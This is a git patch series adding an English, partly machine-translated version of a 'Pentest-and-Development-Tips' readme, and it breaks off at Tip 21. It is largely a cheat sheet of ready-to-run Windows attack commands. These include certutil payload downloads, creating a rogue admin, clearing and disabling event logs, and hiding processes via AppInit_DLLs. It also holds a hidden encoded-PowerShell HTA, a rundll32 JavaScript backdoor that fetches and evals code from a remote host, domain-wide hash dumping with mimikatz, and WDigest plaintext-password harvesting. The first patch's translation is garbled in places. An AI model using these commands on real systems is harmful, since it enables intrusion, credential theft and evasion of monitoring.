From c754c2b7ac9e46f83d7f934213c4285a345d196c Mon Sep 17 00:00:00 2001
From: vaginessa <vaginessa@users.noreply.github.com>
Date: Sat, 9 Dec 2017 16:49:55 +0100
Subject: [PATCH 1/6] add english translation (google-translate)

---
 readme-eng.md | 210 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 210 insertions(+)
 create mode 100644 readme-eng.md

diff --git a/readme-eng.md b/readme-eng.md
new file mode 100644
index 0000000..7bcd502
--- /dev/null
+++ b/readme-eng.md
@@ -0,0 +1,210 @@
+# Pentest-and-Development-Tips
+A collection of pentest and development tips
+
+Author: 3gstudent
+
+### statement
+
+The following tips should not be used for illegal purposes
+
+---
+
+### Tips 1. Manual port detection
+
+The -sV nmap can detect the service version, but in some cases you must manually probe to verify
+
+Use Wireshark response package is overkill, nc simple judgment
+
+eg
+
+For port 8001, nc connected up, just enter a string, get the following result:
+
+`` `
+$ nc -vv localhost 8001
+localhost [127.0.0.1] 8001 (?) open
+asd
+HTTP / 1.1 400 Bad Request
+Date: Fri, 25 Aug 2017 12:15:25 GMT
+Server: Apache / 2.4.23 (Debian)
+Content-Length: 301
+Connection: close
+Content-Type: text / html; charset = iso-8859-1
+<! DOCTYPE HTML PUBLIC "- // IETF // DTD HTML 2.0 // EN">
+<html> <head>
+<title> 400 Bad Request </ title>
+</ head> <body>
+<h1> Bad Request </ h1>
+<p> Your browser sent a request that this server could not understand. <br />
+</ p>
+<hr>
+<address> Apache / 2.4.23 (Debian) Server at 127.0.0.1 Port 8001 </ address>
+</ body> </ html>
+`` `
+
+From this we know that this is an http service because the string we sent was not a valid HTTP request, so we returned a 400 Bad requests, and we also got the system version of Debian, WebServer is Apache
+
+Reference:
+
+["Talk about port exploration experience and principles"] (http://www.freebuf.com/articles/network/146087.html)
+
+
+---
+
+### Tips 2. Windows system to download files from Kali
+
+Kali:
+
+`` `
+python -m SimpleHTTPServer 80
+`` `
+
+Windows:
+
+`` `
+certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
+certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
+`` `
+Reference:
+
+["Certutil.exe in penetration test"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF % 95% E4% B8% AD% E7% 9A% 84certutil.exe /)
+
+---
+
+### Tips 3. Configure the workgroup computer to support net use remote connections
+
+Add user:
+
+`` `
+net user test test / add
+net localgroup administrators test / add
+`` `
+
+Modify the registry to support remote connections:
+
+`` `
+reg add hklm \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ System / v LocalAccountTokenFilterPolicy / t REG_DWORD / d 1
+`` `
+
+net use remote connection:
+
+`` `
+net use \\ 192.168.1.195 test / u: test
+`` `
+
+---
+
+### Tips 4. Windows log clear
+
+Get log classification list:
+
+`` `
+wevtutil el> 1.txt
+`` `
+
+Get statistics for a single log category:
+
+eg
+
+`` `
+wevtutil gli "windows powershell"
+`` `
+
+echo:
+
+`` `
+creationTime: 2016-11-28T06: 01: 37.986Z
+lastAccessTime: 2016-11-28T06: 01: 37.986Z
+lastWriteTime: 2017-08-08T08: 01: 20.979Z
+fileSize: 1118208
+attributes: 32
+numberOfLogRecords: 1228
+oldestRecordNumber: 1
+`` `
+
+View the specific content of the specified log:
+
+`` `
+wevtutil qe / f: text "windows powershell"
+`` `
+
+Delete all information for a single log category:
+
+`` `
+wevtutil cl "windows powershell"
+`` `
+
+Reference:
+
+["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /)
+
+---
+
+### Tips 5. Destroy Windows log records
+
+By calling TerminateThread to achieve the log function of the thread, making the logging failure, but the Windows Event Log service is not damaged, the state is still running
+
+Powershell:
+
+https://github.com/hlldz/Invoke-Phant0m
+
+C ++:
+
+https://github.com/3gstudent/Windwos-EventLog-Bypass
+
+Reference:
+
+["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /)
+
+["Bypassing Windwos Log Monitoring with API-NtQueryInformationThread and I_QueryTagInformation"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread% E5% 92% 8CI_QueryTagInformation% E5% AE% 9E% E7% 8E% B0% E5% AF% B9Windwos% E6% 97% A5% E5% BF% 97% E7% 9B% 91% E6% 8E% A7% E7% 9A% 84% E7% BB% 95% E8% BF% 87 /)
+
+
+---
+
+### Tips 6. The processes under Win7 and Windows Server 2008 R2 are hidden
+
+Use globalAPIhooks, by modifying the registry
+
+Download Project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz
+
+Modify the code to specify the hidden program name cldr.exe, compiled into cldr.dll, cldr.dll on `C: \ ProgramData \ Microsoft \ HelpLibrary \`
+
+Administrator rights:
+
+`` `
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f
+`` `
+
+At this point, cldr.exe does not exist in the Task Manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe
+
+For 64-bit systems:
+
+Administrator rights:
+
+`` `
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldrx64.dll" / f
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0
+reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f
+reg add "hklm \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f
+`` `
+
+Reference:
+
+["Using globalAPIhooks to hide processes under Win7"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7% B3% BB% E7% BB% 9F% E4% B8% 8B% E9% 9A% 90% E8% 97% 8F% E8% BF% 9B% E7% A8% 8B /)
+
+---
+
+### Tips 7. exe and com file of the same name the order of execution
+
+If a path contains both exe and com files of the same name, for example, test.exe and test.com, enter test (without the file extension) via the command line cmd, giving priority to the com file, test.com
+
+The COM file generated only need to exe file extension to com can be
+
+Reference:
+
+"A dirty way of tricking users to bypass UAC"
+
+---

From 671116e0943e9fcacc423e61b1d3719df2580b5b Mon Sep 17 00:00:00 2001
From: vaginessa <vaginessa@users.noreply.github.com>
Date: Sat, 9 Dec 2017 16:55:07 +0100
Subject: [PATCH 2/6] Update README.md

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 7ad1f38..deeb5f0 100644
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 A collection of pentest and development tips
 
 Author： 3gstudent
-
+[English Version](readme-eng.md)
 ### 声明
 
 以下技巧不应用于非法用途

From f729c1d83863b3e50fc8b739df69148d86f4b816 Mon Sep 17 00:00:00 2001
From: vaginessa <vaginessa@users.noreply.github.com>
Date: Sat, 9 Dec 2017 16:56:21 +0100
Subject: [PATCH 3/6] Update README.md

---
 README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/README.md b/README.md
index deeb5f0..07d13b2 100644
--- a/README.md
+++ b/README.md
@@ -2,7 +2,9 @@
 A collection of pentest and development tips
 
 Author： 3gstudent
+
 [English Version](readme-eng.md)
+
 ### 声明
 
 以下技巧不应用于非法用途

From 61f1c2b0f0d18d8d294dfb1ed447207e6ee5fed1 Mon Sep 17 00:00:00 2001
From: Pratik raj <rajpratik71@gmail.com>
Date: Sat, 29 Dec 2018 03:06:25 +0530
Subject: [PATCH 4/6] Full en-US Translation

---
 readme-eng.md | 1955 ++++++++++++++++++++++++++++++++++++++++++++++---
 1 file changed, 1856 insertions(+), 99 deletions(-)

diff --git a/readme-eng.md b/readme-eng.md
index 7bcd502..56ced74 100644
--- a/readme-eng.md
+++ b/readme-eng.md
@@ -1,7 +1,7 @@
 # Pentest-and-Development-Tips
 A collection of pentest and development tips
 
-Author: 3gstudent
+Author： 3gstudent
 
 ### statement
 
@@ -11,200 +11,1957 @@ The following tips should not be used for illegal purposes
 
 ### Tips 1. Manual port detection
 
-The -sV nmap can detect the service version, but in some cases you must manually probe to verify
+Nmap's -sV can detect the service version, but in some cases it must be manually detected to verify
 
-Use Wireshark response package is overkill, nc simple judgment
+Using Wireshark to get a response packet is inevitable and can be easily judged by nc.
 
-eg
+Eg.
 
-For port 8001, nc connected up, just enter a string, get the following result:
+For port 8001, nc is connected, just enter a string and get the following result:
 
-`` `
+```
 $ nc -vv localhost 8001
-localhost [127.0.0.1] 8001 (?) open
-asd
-HTTP / 1.1 400 Bad Request
+Localhost [127.0.0.1] 8001 (?) open
+Asd
+HTTP/1.1 400 Bad Request
 Date: Fri, 25 Aug 2017 12:15:25 GMT
-Server: Apache / 2.4.23 (Debian)
+Server: Apache/2.4.23 (Debian)
 Content-Length: 301
 Connection: close
-Content-Type: text / html; charset = iso-8859-1
-<! DOCTYPE HTML PUBLIC "- // IETF // DTD HTML 2.0 // EN">
-<html> <head>
-<title> 400 Bad Request </ title>
-</ head> <body>
-<h1> Bad Request </ h1>
-<p> Your browser sent a request that this server could not understand. <br />
-</ p>
+Content-Type: text/html; charset=iso-8859-1
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<html><head>
+<title>400 Bad Request</title>
+</head><body>
+<h1>Bad Request</h1>
+<p>Your browser sent a request that this server could not understand.<br /></p>
 <hr>
-<address> Apache / 2.4.23 (Debian) Server at 127.0.0.1 Port 8001 </ address>
-</ body> </ html>
-`` `
+<address>Apache/2.4.23 (Debian) Server at 127.0.0.1 Port 8001</address>
+</body></html>
+```
 
-From this we know that this is an http service because the string we sent was not a valid HTTP request, so we returned a 400 Bad requests, and we also got the system version of Debian, WebServer is Apache
+From this we know that this is an http service, because the string we sent is not a valid HTTP request, so we return a 400 Bad requests, we also get the system version is Debian, WebServer is Apache
 
 Reference:
 
-["Talk about port exploration experience and principles"] (http://www.freebuf.com/articles/network/146087.html)
+["Talk about the experience and principles of port detection"] (http://www.freebuf.com/articles/network/146087.html)
 
 
 ---
 
-### Tips 2. Windows system to download files from Kali
+### Tips 2. Windows system downloads files from Kali
 
 Kali:
 
-`` `
-python -m SimpleHTTPServer 80
-`` `
+```
+Python -m SimpleHTTPServer 80
+```
 
 Windows:
 
-`` `
-certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
-certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
-`` `
+```
+Certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
+Certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
+```
 Reference:
 
-["Certutil.exe in penetration test"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF % 95% E4% B8% AD% E7% 9A% 84certutil.exe /)
+["certutil.exe in penetration test"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF %95%E4%B8%AD%E7%9A%84certutil.exe/)
 
 ---
-
-### Tips 3. Configure the workgroup computer to support net use remote connections
+### Tips 3. Configure the workgroup computer to support net use remote connection
 
 Add user:
 
-`` `
-net user test test / add
-net localgroup administrators test / add
-`` `
+```
+Net user test test /add
+Net localgroup administrators test /add
+```
 
 Modify the registry to support remote connections:
 
-`` `
-reg add hklm \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ System / v LocalAccountTokenFilterPolicy / t REG_DWORD / d 1
-`` `
+```
+Reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
+```
 
-net use remote connection:
+Net use remote connection:
 
-`` `
-net use \\ 192.168.1.195 test / u: test
-`` `
+```
+Net use \\192.168.1.195 test /u:test
+```
 
 ---
 
-### Tips 4. Windows log clear
+### Tips 4. Windows evtx log cleanup
 
-Get log classification list:
+Get a list of evtx log categories:
 
-`` `
-wevtutil el> 1.txt
-`` `
+```
+Wevtutil el >1.txt
+```
 
-Get statistics for a single log category:
+Get statistics for a single evtx log category:
 
-eg
+Eg.
 
-`` `
-wevtutil gli "windows powershell"
-`` `
+```
+Wevtutil gli "windows powershell"
+```
 
 echo:
 
-`` `
-creationTime: 2016-11-28T06: 01: 37.986Z
-lastAccessTime: 2016-11-28T06: 01: 37.986Z
-lastWriteTime: 2017-08-08T08: 01: 20.979Z
+```
+creationTime: 2016-11-28T06:01:37.986Z
+lastAccessTime: 2016-11-28T06:01:37.986Z
+lastWriteTime: 2017-08-08T08:01:20.979Z
 fileSize: 1118208
-attributes: 32
+Attributes: 32
 numberOfLogRecords: 1228
 oldestRecordNumber: 1
-`` `
+```
+
+View the specific content of the specified evtx log:
 
-View the specific content of the specified log:
+```
+Wevtutil qe /f:text "windows powershell"
+```
 
-`` `
-wevtutil qe / f: text "windows powershell"
-`` `
+Find the specified amount of log content:
 
-Delete all information for a single log category:
+```
+Wevtutil qe /f:text "windows powershell" /c:20
+```
+Delete all information for a single evtx log category:
 
-`` `
-wevtutil cl "windows powershell"
-`` `
+```
+Wevtutil cl "windows powershell"
+```
 
 Reference:
 
-["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /)
+["Infiltration Techniques - Deleting and Bypassing Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95% E8%BF%87/)
+
+Single evtx log cleanup:
+
+[Details soon]
 
 ---
 
-### Tips 5. Destroy Windows log records
+### Tips 5. Destroy Windows logging
 
-By calling TerminateThread to achieve the log function of the thread, making the logging failure, but the Windows Event Log service is not damaged, the state is still running
+The thread that implements the logging function is terminated by calling TerminateThread, which disables the logging function, but the Windows Event Log service is not destroyed and the state is still running.
 
 Powershell:
 
 https://github.com/hlldz/Invoke-Phant0m
 
-C ++:
+C++:
 
 https://github.com/3gstudent/Windwos-EventLog-Bypass
 
 Reference:
 
-["Penetration Tips - Remove and Bypass Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5% B7% A7-Windows% E6% 97% A5% E5% BF% 97% E7% 9A% 84% E5% 88% A0% E9% 99% A4% E4% B8% 8E% E7% BB% 95% E8% BF% 87 /)
+["Infiltration Techniques - Deleting and Bypassing Windows Logs"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95% E8%BF%87/)
 
-["Bypassing Windwos Log Monitoring with API-NtQueryInformationThread and I_QueryTagInformation"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread% E5% 92% 8CI_QueryTagInformation% E5% AE% 9E% E7% 8E% B0% E5% AF% B9Windwos% E6% 97% A5% E5% BF% 97% E7% 9B% 91% E6% 8E% A7% E7% 9A% 84% E7% BB% 95% E8% BF% 87 /)
+["Using API-NtQueryInformationThread and I_QueryTagInformation to achieve bypass of Windwos log monitoring"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread% E5%92%8CI_QueryTagInformation%E5%AE%9E%E7%8E%B0%E5%AF%B9Windwos%E6%97%A5%E5%BF%97%E7%9B%91%E6%8E%A7%E7% 9A%84%E7%BB%95%E8%BF%87/)
 
 
 ---
 
-### Tips 6. The processes under Win7 and Windows Server 2008 R2 are hidden
+### Tips 6. Process hiding under Win7 and Windows Server 2008 R2
 
-Use globalAPIhooks, by modifying the registry
+Use globalAPIhooks to modify the registry
 
-Download Project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz
+Download project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz
 
-Modify the code to specify the hidden program name cldr.exe, compiled into cldr.dll, cldr.dll on `C: \ ProgramData \ Microsoft \ HelpLibrary \`
+Modify the code to specify the program name cldr.exe to be hidden, compile into cldr.dll, cldr.dll in `C:\ProgramData\Microsoft\HelpLibrary\`
 
-Administrator rights:
+Administrator privileges:
 
-`` `
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f
-`` `
+```
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
+```
 
-At this point, cldr.exe does not exist in the Task Manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe
+At this time, cldr.exe does not exist in the task manager process list, cldr.exe does not exist in Process Explorer, and cldr.exe does not exist in Tasklist.exe.
 
 For 64-bit systems:
 
-Administrator rights:
+Administrator privileges:
+
+```
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /f
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0
+Reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
+Reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
+```
+
+Reference:
+
+["Using globalAPIhooks to hide processes under Win7 system"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7% B3%BB%E7%BB%9F%E4%B8%8B%E9%9A%90%E8%97%8F%E8%BF%9B%E7%A8%8B/)
 
-`` `
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldrx64.dll" / f
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v RequireSignedAppInit_DLLs / t REG_DWORD / d 0
-reg add "hklm \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v LoadAppInit_DLLs / t REG_DWORD / d 1 / f
-reg add "hklm \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Windows" / v AppInit_DLLs / t REG_SZ / d "C: \\ ProgramData \\ Microsoft \\ HelpLibrary \\ cldr.dll" / f
-`` `
+---
+
+### Tips 7. The same name exe and com file execution order
+
+If a path contains both exe and com files with the same name, such as test.exe and test.com, enter test (without the file suffix) through the command line cmd, and the com file will be run first, ie test.com
+
+The generation of COM files only needs to change the suffix name of the exe file to com.
 
 Reference:
 
-["Using globalAPIhooks to hide processes under Win7"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7% B3% BB% E7% BB% 9F% E4% B8% 8B% E9% 9A% 90% E8% 97% 8F% E8% BF% 9B% E7% A8% 8B /)
+"A dirty way of tricking users to bypass UAC"
 
 ---
 
-### Tips 7. exe and com file of the same name the order of execution
+### Tips 8. Windows system certificate generation and registration
+
+Certificate generation and signature：
+
+```
+makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
+cert2spc Root.cer Root.spc
+pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f
+signtool sign /f Root.pfx /p 12345678password test.exe
+```
+
+After execution, four files Root.cer, Root.pfx, Root.pvk, and Root.spc are generated, and test.exe is digitally signed.
 
-If a path contains both exe and com files of the same name, for example, test.exe and test.com, enter test (without the file extension) via the command line cmd, giving priority to the com file, test.com
+Certificate registration:
 
-The COM file generated only need to exe file extension to com can be
+Admin permission cmd, add the certificate to localmachine:
+
+```
+Certmgr.exe -add -c Root.cer -s -r localmachine root
+```
 
 Reference:
 
 "A dirty way of tricking users to bypass UAC"
 
 ---
+
+### Tips 9. hta execute vbs, load powershell
+
+Test.hta:
+
+```
+<HTML>
+<HEAD>
+<script language="VBScript">
+    Set WshShell = CreateObject("WScript.Shell")
+    Connect="powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=="
+    WshShell.Run Connect, 4, true
+</script>
+<HTA:APPLICATION ID="test"
+WINDOWSTATE = "minimize">
+</HEAD>
+<BODY></BODY> 
+</HTML> 
+```
+Reference:
+
+Bypass McAfee Application Control - Code Execution
+
+---
+
+### Tips 10. Write dll by c# and load dll via rundll32.exe or regsvr32
+
+By default, c# cannot declare exported functions, but can be implemented by adding UnmanagedExports
+
+Of course, dlls written by c# need to be run in the corresponding version of the .NET environment. The dlls written in C++ are more general.
+
+The dll can be loaded by rundll32.exe or regsvr32, but the dll is required to contain a specific export function.
+
+Reference:
+
+Code Execution of Regsvr32.exe
+
+---
+
+### Tips 11. Introduction to cpl file under Windows
+
+Essentially a DLL file with a suffix of cpl and an export function CPLApplet (c can be specified)
+
+Implementation method:
+
+(1) Double click to run directly
+
+(2) cmd
+
+```
+Rundll32 shell32.dll, Control_RunDLL test.cpl
+```
+
+(3) cmd
+
+```
+Control test.cpl
+```
+
+(4)vbs
+
+```
+Dim obj
+Set obj = CreateObject("Shell.Application")
+obj.ControlPanelItem("test.cpl")
+```
+
+(5)js
+
+```
+Var a = new ActiveXObject("Shell.Application");
+a.ControlPanelItem("c:\\test\\test.cpl");
+```
+
+reference:
+
+"Introduction to the use of CPL documents"
+
+---
+
+### Tips 12. Windows calls rundll32 via cmd to execute a piece of code to bounce back to the shell.
+
+Server:
+
+https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1
+
+Client:
+
+```
+Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try {v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split("; ")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send (); B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true );}
+```
+
+Of course, the RAT tool can also be loaded by:
+
+Vbs,js,exe,dll,shellcode
+
+reference:
+
+JavaScript Backdoor
+
+JavaScript Phishing
+
+---
+
+### Tips 13. The key of putty&pageant can be restored by memory dump
+
+Both windows and Linux apply
+
+reference:
+
+Memory Dump Utilization Example
+
+---
+
+### Tips 14. Fishing for Visual Studio
+
+Visual C++:
+- Modify the .vcxproj file
+
+Visual Basic:
+- Modify the .vbproj file
+
+Visual F#:
+- Modify the .fsproj file
+
+Ability to execute arbitrary code when compiling for any of the above projects using Visual Studio
+
+reference:
+
+"Pay close attention to your download code - Visual Studio trick to run code when building"
+
+---
+
+### Tips 15. When a 32-bit program is executed under a 64-bit Windows system, there is a redirect if there is an operation on the registry and files.
+
+For registry operations:
+
+The actual path to access HKLM\Software\ is HKLM\Software\Wow6432Node\
+
+For file operations:
+
+Visit c:\windows\Sysnative\ 的实际路径为 c:\windows\system32\
+The actual path to access c:\windows\system32\ is c:\windows\SysWOW64\
+
+reference:
+
+"Redirection issues to be aware of when running 32-bit programs on 64-bit systems"
+
+---
+
+### Tips 16. Get Windows domain control all user hash
+
+#### method 1:
+
+Copy ntds.dit:
+
+Use NinjaCopy, https://github.com/3gstudent/NinjaCopy
+
+Export hash:
+
+Use quarkspwdump, https://github.com/quarkslab/quarkspwdump
+
+```
+Esentutl /p /o ntds.dit
+QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
+```
+
+#### Method 2:
+
+Use powershell: DSInternals PowerShell Module
+
+https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip
+
+Applicable conditions:
+
+Windows PowerShell 3.0 or 3.0+
+
+.NET Framework 4.0 or 4.0+
+
+reference:
+
+"Exporting the technical finishing of all user hashes in the current domain"
+
+"Using Powershell to quickly export domain control all user hashes"
+
+#### Method 3:
+
+Mimikatz:
+
+```
+Mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"
+```
+
+---
+
+### Tips 17. Export Windows system clear text password
+
+Windows Server 2012 cannot use mimikatz to export plaintext passwords by default, as are some Windows Server 2008.
+
+Workaround: Enable Wdigest Auth
+
+Cmd:
+
+```
+Reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+```
+
+Or
+
+Powershell:
+
+```
+Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
+```
+
+Restart or user login again, can export clear text password
+
+reference:
+
+Domain Infiltration - Dump Clear-Text Password after KB2871997 installed
+
+---
+
+### Tips 18. The new password of the domain controller can be recorded in real time through Hook PasswordChangeNotify.
+
+Of course, you can choose to save locally or upload your password to the server.
+
+reference:
+
+Domain Infiltration - Hook PasswordChangeNotify
+
+---
+
+### Tips 19. Remember to pay attention to the local administrator account of the host in the domain when the domain is infiltrated.
+
+If the administrator neglects that the hosts in the domain use the same local administrator account, you can remotely log in to other hosts in the domain through pass-the-hash.
+
+reference:
+
+Domain Penetration - Local Administrator Password Solution
+
+---
+
+### Tips 20. Get the dll export function through powershell
+
+https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1
+
+```
+Get-Exports -DllPath c:\Windows\system32\dimsjob.dll -ExportsToCpp C:\test\export.txt
+```
+
+reference:
+
+[Study Notes Weekly No.3 (Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-Weekly-No. 3 (Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger)/)
+
+---
+
+### Tips 21. Parameter hiding tips for shortcuts
+
+Put the payload after 260 null characters, so you can't view the payload in the file attribute. It can be used to hide the payload in the shortcut, trick the user to click, and conceal the execution code.
+
+reference:
+
